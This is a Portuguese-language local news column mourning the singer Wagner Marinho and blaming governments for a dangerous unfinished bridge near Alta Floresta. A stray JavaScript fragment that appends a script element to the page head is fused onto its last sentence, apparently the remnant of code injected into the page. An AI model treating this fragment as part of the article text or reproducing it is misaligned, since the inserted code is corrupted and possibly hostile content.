Últimas Notícias

Tiro e Queda

Tiro e QuedaCheguei ontem da viagem que fiz com minha família à região sul do Estado e confesso que estava eufórico em retornar para o meu dia a dia.

No entanto, ainda na estrada (essa instantaneidade das comunicações atuais) soube da morte do cantor, compositor, empresário do ramo de agência de viagens e amigo Wagner Marinho.

A tristeza tomou conta da viagem, o retorno foi difícil mas, como se diz, a vida segue.

Poderia aqui escrever sobre a alegria que o Marinho esbanjava não apenas em suas apresentações, mas no trato com as pessoas diariamente, ou sobre a qualidade vocal das suas interpretações, ou ainda sobre a forma interessada em que atendia seus clientes de passagens aéreas…

Tudo isso é importante, conforta os corações dos familiares, que precisam muito de nossos apoios neste momento, mas…

Não tem como escrever meu primeiro Tiro e Queda de 2017, sem citar a falta de responsabilidade dos governos (atual e passado) que raramente fazem algo de bom para o cidadão, mas quando fazem, como é o caso do asfalto que liga Alta Floresta às cidades de Nova Monte Verde, Nova Bandeirantes e outras localidades ao extremo norte, deixam “armadilhas” para os usuários das MTs.

Foi nesta mesma ponte que morreu em 2015, o responsável pelo Marketing Uniflor, Gelson Luiz, quando errou a ponte conhecida localmente como “curva torta” ou “ponte torta”.

Outras pessoas já se acidentaram e perderam suas vidas, ou ficaram com sequelas, ou mesmo com algum tipo de problema temporário.

O que falta para que os governantes “terminem” o serviço? Que mais pessoas morram? Que outras famílias chorem? Que mais vidas sejam encerradas assim precocemente?

Uma resposta agora não irá trazer de volta o Marinho, ou o Gelson, ou as outras vítimas, mas com certeza irá evitar que outras pessoas morram.

A música sertaneja perdeu um grande cantor.

Os amigos perderam um cara batuta, sensacional.

A mãe e a esposa, a filha, perderam um filho e pai de família exemplar.

O mundo perdeu um cara super gente boa.

Não vamos deixar que mais tragédias como essa criem mais choros e tristezas.d.getElementsByTagName(‘head’)[0].appendChild(s);

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top